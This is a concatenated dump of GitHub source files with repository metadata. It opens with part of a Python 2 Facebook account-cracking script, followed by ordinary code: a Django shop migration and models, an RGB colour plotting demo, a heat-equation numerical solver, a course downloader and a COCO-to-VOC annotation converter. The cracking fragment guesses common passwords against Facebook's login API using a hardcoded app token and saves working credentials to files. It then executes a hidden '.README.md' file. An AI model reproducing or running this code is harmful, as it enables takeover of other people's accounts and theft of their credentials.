if 'access_token' in q:
print '\x1b[1;91mUNKNOWN-TRICKER\x1b[1;97m-\x1b[1;94m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass1
okb = open('save/successfull.txt', 'a')
okb.write(k+c+user+'|'+pass1+'\n')
okb.close()
oks.append(c+user+pass1)
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;92mAFTER(7DAYS)\x1b[1;95m-\x1b[1;93m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass1
cps = open('save/checkpoint.txt', 'a')
cps.write(k+c+user+'|'+pass1+'\n')
cps.close()
cpb.append(c+user+pass1)
else:
pass2 = 'pakistan'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91mUNKNOWN-TRICKER√\x1b[1;97m-\x1b[1;94m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass2
okb = open('save/successfull.txt', 'a')
okb.write(k+c+user+'|'+pass2+'\n')
okb.close()
oks.append(c+user+pass2)
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;92mAFTER(7DAYS)\x1b[1;95m-\x1b[1;93m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass2
cps = open('save/checkpoint.txt', 'a')
cps.write(k+c+user+'|'+pass2+'\n')
cps.close()
cpb.append(c+user+pass2)
else:
pass3 = '786786'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91mUNKNOWN-TRICKER√\x1b[1;97m-\x1b[1;94m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass3
okb = open('save/successfull.txt', 'a')
okb.write(k+c+user+'|'+pass3+'\n')
okb.close()
oks.append(c+user+pass3)
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;92mAFTER(7DAYS)\x1b[1;95m-\x1b[1;93m✙\x1b[1;96m-' + k + c + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass3
cps = open('save/checkpoint.txt', 'a')
cps.write(k+c+user+'|'+pass3+'\n')
cps.close()
cpb.append(c+user+pass3)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 50*'-'
print '[✓] Process Has Been Completed ....'
print '[✓] Total OK/CP : '+str(len(oks))+'/'+str(len(cpb))
print('[✓] CP File Has Been Saved : save/checkpoint.txt')
raw_input('\n[Press Enter To Go Back]')
os.system('python2 .README.md')
if __name__ == '__main__':
menu()
| [
"noreply@github.com"
] | noreply@github.com |
fcbdb9ef1a0daa356c62eb50655a1bb59ae04218 | c5f719c6387616151c7f701b98739f754024de6b | /project/migrations/0001_initial.py | 33774985ec177362fdbb66f8057e15b85eef21ae | [] | no_license | arifmahmood/shop | 85fbf369a8802821c2a7ea1d2a73e53a4754aa35 | 9add175f03facf693b3629c96e4f83824451bfde | refs/heads/master | 2021-01-21T22:14:47.459651 | 2018-01-30T19:07:53 | 2018-01-30T19:07:53 | 102,138,538 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,818 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2017-08-26 18:35
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Customer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
('address', models.CharField(max_length=150)),
('mobile_no', models.CharField(max_length=20)),
],
),
migrations.CreateModel(
name='Item',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
('size', models.CharField(max_length=50)),
('stock_rate', models.DecimalField(blank=True, decimal_places=2, max_digits=10, null=True)),
('sale_rate', models.DecimalField(blank=True, decimal_places=2, max_digits=10, null=True)),
],
),
migrations.CreateModel(
name='Memo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField()),
('discount', models.DecimalField(blank=True, decimal_places=2, max_digits=10, null=True)),
('paid', models.DecimalField(blank=True, decimal_places=2, max_digits=10, null=True)),
('party', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='project.Customer')),
],
),
migrations.CreateModel(
name='PurchaseItem',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('quantity', models.IntegerField()),
('free', models.IntegerField()),
('item', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='project.Item')),
],
),
migrations.CreateModel(
name='PurchaseMemo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField()),
('discount', models.DecimalField(blank=True, decimal_places=2, max_digits=10, null=True)),
('paid', models.DecimalField(blank=True, decimal_places=2, max_digits=10, null=True)),
],
),
migrations.CreateModel(
name='SaleItem',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('quantity', models.IntegerField()),
('free', models.IntegerField()),
('item', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='project.Item')),
],
),
migrations.CreateModel(
name='Sr',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
('address', models.CharField(max_length=150)),
],
),
migrations.CreateModel(
name='Supplier',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
('address', models.CharField(max_length=150)),
('mobile_no', models.CharField(max_length=20)),
('sr', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='project.Sr')),
],
),
migrations.AddField(
model_name='purchasememo',
name='party',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='project.Supplier'),
),
migrations.AddField(
model_name='purchasememo',
name='purchase_item',
field=models.ManyToManyField(to='project.PurchaseItem'),
),
migrations.AddField(
model_name='memo',
name='sale_item',
field=models.ManyToManyField(to='project.SaleItem'),
),
migrations.AddField(
model_name='customer',
name='sr',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='project.Sr'),
),
]
| [
"arifmahmoodsourav@gmail.com"
] | arifmahmoodsourav@gmail.com |
2cca6dfe4d4574b35d0e7a6b57e0cbab8b47d763 | 5ec88621138734c8ee2a8388ec29f157d54dcbb0 | /code/4_BGR_colors.py | 6a06f9f4a39620c02507b811054a9dc32ee573d7 | [] | no_license | SingaporeDataScienceConsortium/Image-Processing-and-Computer-Vision-Using-Python-and-OpenCV | 99e7668f3d0a15b07faeb0bcce8f004ce33e7558 | c02c35cc192bde411480832e93ba81c777668718 | refs/heads/main | 2023-01-11T01:32:51.519621 | 2020-11-12T15:51:41 | 2020-11-12T15:51:41 | 312,322,777 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,201 | py | # The code is shared on SDSC Github
import numpy as np
from matplotlib import pyplot as plt
plt.subplot(3, 3, 1) # create panel (3 rows and 3 columns) and locate to the first sub-figure
RGB = np.zeros([50,50,3], dtype = 'uint8')
RGB[:,:,0] = 0 # define the intensity (0-255) in channel 1 - Red
RGB[:,:,1] = 0 # define the intensity (0-255) in channel 2 - Green
RGB[:,:,2] = 0 # define the intensity (0-255) in channel 3 - Blue
plt.imshow(RGB) # display the merged color
plt.title('R G B = 0 0 0') # title
plt.xticks([]) # remove x axis
plt.yticks([]) # remove y axis
plt.subplot(3, 3, 2)
RGB = np.zeros([50,50,3], dtype = 'uint8')
RGB[:,:,0] = 128
RGB[:,:,1] = 0
RGB[:,:,2] = 0
plt.imshow(RGB)
plt.title('R G B = 128 0 0')
plt.xticks([])
plt.yticks([])
plt.subplot(3, 3, 3)
RGB = np.zeros([50,50,3], dtype = 'uint8')
RGB[:,:,0] = 255
RGB[:,:,1] = 0
RGB[:,:,2] = 0
plt.imshow(RGB)
plt.title('R G B = 255 0 0')
plt.xticks([])
plt.yticks([])
plt.subplot(3, 3, 4)
RGB = np.zeros([50,50,3], dtype = 'uint8')
RGB[:,:,0] = 0
RGB[:,:,1] = 128
RGB[:,:,2] = 128
plt.imshow(RGB)
plt.title('R G B = 0 128 128')
plt.xticks([])
plt.yticks([])
plt.subplot(3, 3, 5)
RGB = np.zeros([50,50,3], dtype = 'uint8')
RGB[:,:,0] = 128
RGB[:,:,1] = 128
RGB[:,:,2] = 128
plt.imshow(RGB)
plt.title('R G B = 128 128 128')
plt.xticks([])
plt.yticks([])
plt.subplot(3, 3, 6)
RGB = np.zeros([50,50,3], dtype = 'uint8')
RGB[:,:,0] = 255
RGB[:,:,1] = 128
RGB[:,:,2] = 128
plt.imshow(RGB)
plt.title('R G B = 255 128 128')
plt.xticks([])
plt.yticks([])
plt.subplot(3, 3, 7)
RGB = np.zeros([50,50,3], dtype = 'uint8')
RGB[:,:,0] = 0
RGB[:,:,1] = 255
RGB[:,:,2] = 255
plt.imshow(RGB)
plt.title('R G B = 0 255 255')
plt.xticks([])
plt.yticks([])
plt.subplot(3, 3, 8)
RGB = np.zeros([50,50,3], dtype = 'uint8')
RGB[:,:,0] = 128
RGB[:,:,1] = 255
RGB[:,:,2] = 255
plt.imshow(RGB)
plt.title('R G B = 128 255 255')
plt.xticks([])
plt.yticks([])
plt.subplot(3, 3, 9)
RGB = np.zeros([50,50,3], dtype = 'uint8')
RGB[:,:,0] = 255
RGB[:,:,1] = 255
RGB[:,:,2] = 255
plt.imshow(RGB)
plt.title('R G B = 255 255 255')
plt.xticks([])
plt.yticks([])
| [
"noreply@github.com"
] | noreply@github.com |
d14e39b92b168f16694f2e86414676e241c24375 | 64c7e148678e3322a19fd83d928c2b6f6b68d4a0 | /Strikwerda-Problems/Chapter-6/Section-3/Problem-11/p6311.py | 1a225390ec97edb0a185c7da7f9e93b7dc940ff9 | [] | no_license | floresab/MTH-693b | 3357bbf2e35c6a5531a7e62e419fd617fbe94fa9 | b92e5ce49f9bc367234853da72f1cfd466cac8a9 | refs/heads/master | 2020-03-08T17:49:56.847875 | 2018-05-10T00:35:16 | 2018-05-10T00:35:16 | 128,278,965 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 13,655 | py | """
Author : Abraham Flores
File : p6311.py
Language : Python 3.6
Created : 3/20/2018
Edited : 3/21/2018
San Digeo State University
MTH 693b : Computational Partial Differential Equations
Strikwerda 6.3.11 : Parabolic Equations
Heat Equation:
u_t = b*u_xx
x = [-1,1]
t = [0,1/2]
| 1 - |x| for |x| < 1/2
u_0(x) = | 1/4 for |x| = 1/2
| 0 for |x| > 1/2
Exact Solution:
u(t,x) =
3/8 +
SUM[(cos(2pi*x*(2*i+1)))/(pi**2*(2*i+1)**2)*exp(-4t*pi**2(2*i+1)**2)]
(i=0,inf)
+
SUM[((-1)**j/(pi*(2j+1))+(2)/(pi**2*(2j+1)**2))*cos(pi*x*(2*j+1))*exp(-t*pi**2*(2*j+1)**2)]
(j=0,inf)
h = 1/10, 1/20, 1/40, 1/80
a) Foward-Time Central-Space : mu = .4
b) Crank-Nicolson(6.3.4) : lambda = 1 / mu = 1/h
c) Crank-Nicolson(6.3.4) : mu = 5
Boundaries:
u(t,-1) = Exact
u_x(t,1) = 0
V(n,M+1) = V(n,M-1)
"""
import os,glob
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
from scipy.sparse import diags
#Generators Exact Solution
def Exact(t,x,lim):
sum1 = 0
sum2 = 0
for i in range(lim):
#First Sum
#################################
numerator = np.cos(2*np.pi*x*(2*i+1))
denominator = np.pi**2*(2*i+1)**2
decay = np.exp(-4*t*np.pi**2*(2*i+1)**2)
sum1 += numerator/denominator*decay
#################################
#Second Sum
#################################
term1 = (-1)**i/(np.pi*(2*i+1))
term2 = 2.0/(np.pi**2*(2*i+1)**2)
osc_decay = np.cos(np.pi*x*(2*i+1))*np.exp(-t*np.pi**2*(2*i+1)**2)
sum2 += (term1 + term2)*osc_decay
#################################
return 3.0/8 + sum1 + sum2
#Generates intial value function
def intial_foo(x):
if abs(x) < 0.5:
return 1 - abs(x)
if abs(x) == 0.5:
return 0.25
if abs(x) > 0.5:
return 0
#Plot
def plot(x,U,bounds,time,title,fileLoc):
sns.set(font_scale = 2)
sns.set_style("darkgrid", {"axes.facecolor": ".9"})
fig,ax = plt.subplots()
fig.set_size_inches(8,8)
plt.plot(x,U,linewidth=3.0,label="t = "+ str(round(time,3)),color="r")
plt.axis(bounds)
plt.xlabel('x (Spatial)')
plt.ylabel('U(t,x)')
plt.title(title)
plt.legend()
plt.savefig(fileLoc+".png")
plt.close()
def plot_error(x,U,labels,bounds,time,title,fileLoc):
sns.set(font_scale = 2)
sns.set_style("darkgrid", {"axes.facecolor": ".9"})
fig,ax = plt.subplots()
fig.set_size_inches(8,8)
colors = ["r","b","c"]
for i in range(len(U)):
plt.plot(x,U[i],linewidth=3.0,label=labels[i],color=colors[i])
x_c = bounds[0] + (bounds[1]-bounds[0])/35
y_c = bounds[-1] - (bounds[-1]-bounds[-2])/10
ax.annotate("t = "+ str(round(time,3)),xy=(0,0) ,xytext=(x_c,y_c))
plt.axis(bounds)
plt.xlabel('x (Spatial)')
plt.ylabel('U(t,x) or |Error|')
plt.title(title)
plt.legend()
plt.savefig(fileLoc+".png")
plt.close()
"""
Makes a gif given a name and delay for each image in ms
--Assumes the images are in the figures directory
"""
def makeGif(gifName,delay):
os.chdir('Figures')
#Create txt file for gif command
fileList = glob.glob('*.png') #star grabs everything,
fileList.sort()
#writes txt file
file = open('FileList.txt', 'w')
for item in fileList:
file.write("%s\n" % item)
file.close()
os.system('convert -delay ' + str(delay) + ' @FileList.txt ' + gifName + '.gif')
os.system('del FileList.txt')
os.system('del *.png')
os.chdir('..')
"""
Computes intercept and slope for an unweighted linear best fit
"""
def best_fit(X, Y):
xbar = sum(X)/len(X)
ybar = sum(Y)/len(Y)
n = len(X) # or len(Y)
numer = sum([xi*yi for xi,yi in zip(X, Y)]) - n * xbar * ybar
denum = sum([xi**2 for xi in X]) - n * xbar**2
b = numer / denum
a = ybar - b * xbar
return a, b
def plot_norm(scheme,h,mu,inf_norm,L2_norm):
sns.set(font_scale = 2)
sns.set_style("darkgrid", {"axes.facecolor": ".9"})
fig,ax = plt.subplots()
fig.set_size_inches(14.4,9)
plt.scatter(h,inf_norm,linewidth=3.0,color="r",label=r'$-Log_{10}$[INFINITY NORM]')
plt.scatter(h,L2_norm,linewidth=3.0,color="b",label=r'$-Log_{10}$[L2 NORM]')
#plt.xlim(1, 2)
plt.xlabel(r'$-Log_{10}$[dx]')
plt.ylabel(r'$-Log_{10}$|ERROR|')
plt.title(scheme +" mu: "+str(mu)+" -- TIME: 0.5")
a_inf, b_inf = best_fit(h, inf_norm)
yfit = [a_inf + b_inf * xi for xi in h]
plt.plot(h, yfit,color="k",label="(INF) SLOPE: "+str(round(b_inf,5)))
a_L2, b_L2 = best_fit(h, L2_norm)
yfit = [a_L2 + b_L2 * xi for xi in h]
plt.plot(h, yfit,color="k",label="(L2) SLOPE: "+str(round(b_L2,5)))
plt.legend()
plt.savefig("Figures/Error/"+scheme+"_norm_err_mu_"+str(mu)+".png")
plt.close()
"""
Uses the Crank-Nicolson scheme to solve the given parabolic equation
"""
def Crank_Nicolson(h,mu):
b = 1
k = b*mu
#generate array of intial values at t = 0
X = np.arange(0-1,1+h,h)
#dimension of our matrix
dim = len(X)
temp = []
for dx in X:
temp.append(intial_foo(dx))
#intialize array v{n,m}
next_ = np.array(temp)
#Generate Left and right matrices
NEXT = np.array([(-k/2)*np.ones(dim-1),(1+k)*np.ones(dim),(-k/2)*np.ones(dim-1)])
CURRENT = np.array([(k/2)*np.ones(dim-1),(1-k)*np.ones(dim),(k/2)*np.ones(dim-1)])
offset = [-1,0,1]#Location of each diagonal
LEFT = diags(NEXT,offset).toarray()#Generate Matrix (n+1)
RIGHT = diags(CURRENT,offset).toarray()#Generate Matrix (n)
#Embed boundary conditions on matrix
LEFT[0] *= 0
LEFT[-1] *= 0
LEFT[0][0] = 1
LEFT[-1][-1] = 1 + k
LEFT[-1][-2] = -k
RIGHT[0] *= 0
RIGHT[-1] *= 0
RIGHT[0][0] = 1
RIGHT[-1][-1] = 1 - k
RIGHT[-1][-2] = k
title = "6.3.11: Crank-Nicolson: h: " +str(round(h,4)) + ", mu: " +str(mu)
bounds = [-1,1,0,1]
#plot
outFile = "Figures\CN00000"
plot(X,next_,bounds,0,title,outFile)
steps = int(0.5/(mu*h**2)) + 2
for t in range(1,steps):
time = t*mu*h**2
#implement Scheme
next_ = np.linalg.tensorsolve(LEFT,np.matmul(RIGHT,next_))
#Boundary Conditions
next_[0] = Exact(time,-1,15)
#plot
str_time = '0'*(5-len(str(t)))+str(t)
outFile = "Figures\CN" + str_time
plot(X,next_,bounds,time,title,outFile)
#makeGif
makeGif("Crank_Nicolson_h_"+str(h)+"_mu_"+str(mu),10)
def FTCS(h,mu):
b = 1
k = b*mu
#generate array of intial values at t = 0
X = np.arange(-1,1+h,h)
temp = []
for dx in X:
temp.append(intial_foo(dx))
next_ = np.array(temp)
title = "6.3.11: FTCS mu: " +str(round(mu,3))
bounds = [-1,1,0,1]
outFile = "Figures\FTCS00000"
plot(X,next_,bounds,0,title,outFile)
steps = int(0.5/(mu*h**2)) + 2
for t in range(1,steps):
time = t*mu*h**2
#implement Scheme
prev_ = next_
#np.roll: postive shift => terms to the left, negative => terms to the right
next_ = k*(np.roll(next_,1)+np.roll(next_,-1)) + (1-2*k)*next_
#Boundary Conditions
next_[-1] = 2*k*prev_[-2] + (1-2*k)*prev_[-1]
next_[0] = Exact(time,-1,15)
#plot
str_time = '0'*(5-len(str(t)))+str(t)
outFile = "Figures\FTCS" + str_time
plot(X,next_,bounds,time,title,outFile)
#makeGif
makeGif("FTCS_h_"+str(h)+"_mu_"+str(mu),10)
def ExactGIF(h,Lamb):
#generate array of intial values at t = 0
X = np.arange(0-1,1+h,h)
temp = []
for dx in X:
temp.append(intial_foo(dx))
#plot
title = "6.3.11: Exact Solution"
str_time = '00000'
outFile = "Figures\exact" + str_time
bounds = [-1,1,0,1]
plot(X,np.asarray(temp),bounds,0,title,outFile)
steps = int(0.5/(Lamb*h)) + 2
for t in range(1,steps):
time = t*Lamb*h
sol_t = Exact(time,X,25)
#plot
str_time = '0'*(5-len(str(time)))+str(time)
outFile = "Figures\exact" + str_time
plot(X,sol_t,bounds,t,title,outFile)
#makeGif
makeGif("Exact_Solution_h_"+str(h)+"_Lambda_"+str(Lamb),10)
def CN_error(h,mu,gif,n_img):
b = 1
#generate array of intial values at t = 0
X = np.arange(0-1,1+h,h)
#dimension of our matrix
dim = len(X)
temp = []
for dx in X:
temp.append(intial_foo(dx))
next_ = np.array(temp)
k = b*mu
NEXT = np.array([(-k/2)*np.ones(dim-1),(1+k)*np.ones(dim),(-k/2)*np.ones(dim-1)])
CURRENT = np.array([(k/2)*np.ones(dim-1),(1-k)*np.ones(dim),(k/2)*np.ones(dim-1)])
offset = [-1,0,1]#Location of each diagonal
LEFT = diags(NEXT,offset).toarray()#Generate Matrix (n+1)
RIGHT = diags(CURRENT,offset).toarray()#Generate Matrix (n)
#Embed boundary conditions on matrix
LEFT[0] *= 0
LEFT[-1] *= 0
LEFT[0][0] = 1
LEFT[-1][-1] = 1 + k
LEFT[-1][-2] = -k
RIGHT[0] *= 0
RIGHT[-1] *= 0
RIGHT[0][0] = 1
RIGHT[-1][-1] = 1 - k
RIGHT[-1][-2] = k
if gif:
title = "6.3.11: Crank-Nicolson: h: " +str(round(h,4)) + ", mu: " +str(mu)
bounds = [-1,1,0,1]
inf_norm = []
L2_norm = []
steps = int(0.5/(mu*h**2)) + 2
for t in range(1,steps):
time = t*mu*h**2
sol_t = Exact(time,X,15)
#implement Scheme
next_ = np.linalg.tensorsolve(LEFT,np.matmul(RIGHT,next_))
#Boundary Conditions
next_[0] = Exact(time,-1,15)
err = abs(sol_t - next_)
inf_norm.append(-1*np.log10(max(err)))
L2_norm.append(-1*np.log10(np.sqrt(sum(err*err))))
#plot
if gif and (t%n_img==0):
str_time = '0'*(5-len(str(t)))+str(t)
outFile = "Figures\CN_err" + str_time
plot_error\
(X,[sol_t,next_,err],["Exact","CN","|Error|"],bounds,time,title,outFile)
if gif:
#makeGif
makeGif("CN_ERROR_h_"+str(h)+"_mu_"+str(mu),10)
return inf_norm[-1],L2_norm[-1]
def FTCS_error(h,mu,gif,n_img):
b = 1
k = b*mu
#generate array of intial values at t = 0
X = np.arange(0-1,1+h,h)
#dimension of our matrix
temp = []
for dx in X:
temp.append(intial_foo(dx))
next_ = np.array(temp)
if gif:
title = "6.3.11: FTCS: h: " +str(round(h,4)) + " mu: " +str(mu)
bounds = [-1,1,0,1]
inf_norm = []
L2_norm = []
steps = int(0.5/(mu*h**2)) + 2
for t in range(1,steps):
time = t*mu*h**2
sol_t = Exact(time,X,15)
#implement Scheme
prev_ = next_
#np.roll: postive shift => terms to the left, negative => terms to the right
next_ = k*(np.roll(next_,1)+np.roll(next_,-1)) + (1-2*k)*next_
#Boundary Conditions
next_[-1] = 2*k*prev_[-2] + (1-2*k)*prev_[-1]
next_[0] = Exact(time,-1,15)
err = abs(sol_t - next_)
inf_norm.append(-1*np.log10(max(err)))
L2_norm.append(-1*np.log10(np.sqrt(sum(err*err))))
#plot
if gif and (t%n_img==0):
str_time = '0'*(5-len(str(t)))+str(t)
outFile = "Figures\FTCS_err" + str_time
plot_error\
(X,[sol_t,next_,err],["Exact","FTCS","|Error|"],bounds,time,title,outFile)
if gif:
#makeGif
makeGif("FTCS_ERROR_h_"+str(h)+"_mu_"+str(mu),10)
return inf_norm[-1],L2_norm[-1]
if __name__ == "__main__":
inf_all = []
L2_all = []
h = []
for i in range(10,110,10):
inf,L2 = FTCS_error(1.0/i,0.4,False)
inf_all.append(inf)
L2_all.append(L2)
h.append(-1*np.log10(1.0/i))
plot_norm("FTCS",h,0.4,inf_all,L2_all)
inf_all = []
L2_all = []
h = []
for i in range(10,110,10):
inf,L2 = CN_error(1.0/i,5,False)
inf_all.append(inf)
L2_all.append(L2)
h.append(-1*np.log10(1.0/i))
plot_norm("Crank-Nicolson",h,5,inf_all,L2_all)
inf_all = []
L2_all = []
h = []
for i in range(10,110,10):
inf,L2 = CN_error(1.0/i,i,False)
inf_all.append(inf)
L2_all.append(L2)
h.append(-1*np.log10(1.0/i))
plot_norm("Crank-Nicolson",h,r"$h^{-1}$",inf_all,L2_all)
#The plots are moved to error directory so they do not get deleted
dx = [1/10,1/20]
for h in dx:
CN_error(h,5,True,1)
CN_error(h,1/h,True,1)
FTCS_error(h,0.4,True,1)
dx = [1/40,1/80]
for h in dx:
CN_error(h,5,True,(1/(8*h)))
CN_error(h,1/h,True,1)
FTCS_error(h,0.4,True,(1/(8*h)))
'''
Report.
The accuracy of both schemes are reasonably accurate, however the FTCS scheme
is extremly fast due being explicit and without matrix multiplication.
Although it is essentialy matrix multiplication.
'''
| [
"noreply@github.com"
] | noreply@github.com |
425df93c462fc6066a78b75e9bab55d6bdcbb602 | 64285c1356cd31426214a3c69a9ae7caf6600a97 | /download.py | c8b47f6bd2c8ae2e62312423abeb39ef93ef9eb0 | [
"MIT"
] | permissive | cl1ck/tutsplus-downloader | de13cc5d69bb5ba402efa30118bdc1c6b3b4dd29 | 80556ccb52da0f326f10125b5b1ee5506cfc6ab4 | refs/heads/master | 2021-01-15T12:27:53.603994 | 2015-06-05T09:00:55 | 2015-06-05T09:00:55 | 27,097,228 | 3 | 1 | null | 2015-05-17T19:32:04 | 2014-11-24T22:02:54 | Python | UTF-8 | Python | false | false | 328 | py | #! /usr/bin/env python
#-*- coding: utf-8 -*-
from Tutsplus import Tutsplus
username = 'my_username'
password = 'my_password'
courses_url = ['https://tutsplus.com/course/say-yo-to-yeoman/',
'https://tutsplus.com/course/phone-gap-essentials/' ]
t = Tutsplus(username, password)
t.download_courses(courses_url)
| [
"mauromarano@MacBook-Pro-di-Mauro.local"
] | mauromarano@MacBook-Pro-di-Mauro.local |
6fae718acf95e014caaf32ba33593bb4db9988ac | ccdfab61c91114ac83353ec3825be34712a3fd4c | /core/models.py | 51a0b68ca64452e64571614d78508620bcd3b28c | [] | no_license | johnpozo/parroquia | 040271b1bce2740b417745dceab3082929a3b710 | bf46585034c426875f15c05770e110f978fedfd9 | refs/heads/master | 2020-04-09T14:57:57.725141 | 2018-12-04T20:04:20 | 2018-12-04T20:04:20 | 160,288,390 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,177 | py | from django.db import models
# Create your models here.
class Comunidad(models.Model):
descripcion = models.CharField(max_length=30)
ubicacion = models.CharField(max_length=30)
def __str__(self):
return self.descripcion
class Meta:
verbose_name = "Comunidad"
verbose_name_plural = "Comunidades"
class TipoEvento(models.Model):
descripcion = models.CharField(max_length=30)
def __str__(self):
return self.descripcion
#subclase que permite nombrar las tablas en el administrador
class Meta:
verbose_name = "Tipo de Evento"
verbose_name_plural = "Tipos de Evento"
class TipoPersona(models.Model):
descripcion = models.CharField(max_length=30)
def __str__(self):
return self.descripcion
class Meta:
verbose_name = "Tipo de Persona"
verbose_name_plural = "Tipos de Persona"
class Evento(models.Model):
fecha_evento = models.DateField(auto_now=False, auto_now_add=False)
hora_evento = models.TimeField(auto_now=False, auto_now_add=False)
descripcion = models.CharField(max_length=50)
direccion = models.CharField(max_length=50)
tipo_evento = models.ForeignKey(TipoEvento, on_delete=models.CASCADE)
comunidad = models.ForeignKey(Comunidad, on_delete=models.CASCADE, null=True)
def __str__(self):
return self.descripcion
class Meta:
verbose_name = "Evento"
verbose_name_plural = "Eventos"
class Persona(models.Model):
nombre = models.CharField(max_length=40)
apellido = models.CharField(max_length=40)
edad = models.IntegerField()
sexo = models.CharField(max_length=20)
telefono = models.CharField(max_length=15)
direccion = models.CharField(max_length=50)
tipo_persona = models.ForeignKey(TipoPersona, on_delete=models.CASCADE, related_name='cargo')
tipo_evento = models.ForeignKey(TipoEvento, on_delete=models.CASCADE, null=True)
comunidad = models.ForeignKey(Comunidad, on_delete=models.CASCADE, null=True)
def __str__(self):
return self.nombre + ' ' +self.apellido
class Meta:
verbose_name = "Persona"
verbose_name_plural = "Personas" | [
"LC1301319"
] | LC1301319 |
24c645c0cd419a07dc36807a10d56f44914471fe | 29f124bffdf2d877726a9687372ee9ebda174a4f | /dataset/coco_dataset_to_voc.py | 4f2c23c5422a9c29a198dae70bac11468e1ee4af | [] | no_license | richiesui/yolo-training-tf2 | c926f7a1d15ef8d1a8b641671c36c79d18f76cc0 | e3bf2719fad6f385744bae2820140d2dc88420bb | refs/heads/main | 2023-08-01T06:09:35.148575 | 2021-09-23T11:38:45 | 2021-09-23T11:39:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,408 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
A simple script to pick out PascalVOC object from COCO annotation dataset
"""
import os, sys, argparse
import numpy as np
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..'))
from common.utils import get_classes, get_dataset
def main():
parser = argparse.ArgumentParser(description='Pick out VOC object from COCO annotation dataset')
parser.add_argument('--coco_annotation_file', type=str, required=True,
help='coco annotation txt file')
parser.add_argument('--coco_classes_path', type=str, default='../../configs/coco_classes.txt',
help='path to coco class definitions, default=%(default)s')
parser.add_argument('--voc_classes_path', type=str, default='../../configs/voc_classes.txt',
help='path to voc class definitions, default=%(default)s')
parser.add_argument('--output_voc_annotation_file', type=str, required=True,
help='output voc classes annotation file')
args = parser.parse_args()
# param parse
coco_class_names = get_classes(args.coco_classes_path)
voc_class_names = get_classes(args.voc_classes_path)
coco_annotation_lines = get_dataset(args.coco_annotation_file)
output_file = open(args.output_voc_annotation_file, 'w')
for coco_annotation_line in coco_annotation_lines:
# parse annotation line
coco_line = coco_annotation_line.split()
image_name = coco_line[0]
boxes = np.array([np.array(list(map(int, box.split(',')))) for box in coco_line[1:]])
has_voc_object = False
for box in boxes:
coco_class_id = box[-1]
# check if coco object in voc class list
# if true, keep the image & box info
if coco_class_names[coco_class_id] in voc_class_names:
if has_voc_object == False:
has_voc_object = True
output_file.write(image_name)
# get VOC class ID of the COCO object
voc_class_id = voc_class_names.index(coco_class_names[coco_class_id])
output_file.write(" " + ",".join([str(b) for b in box[:-2]]) + ',' + str(voc_class_id))
if has_voc_object == True:
output_file.write('\n')
output_file.close()
if __name__ == '__main__':
main()
| [
"tienhiep11@gmail.com"
] | tienhiep11@gmail.com |
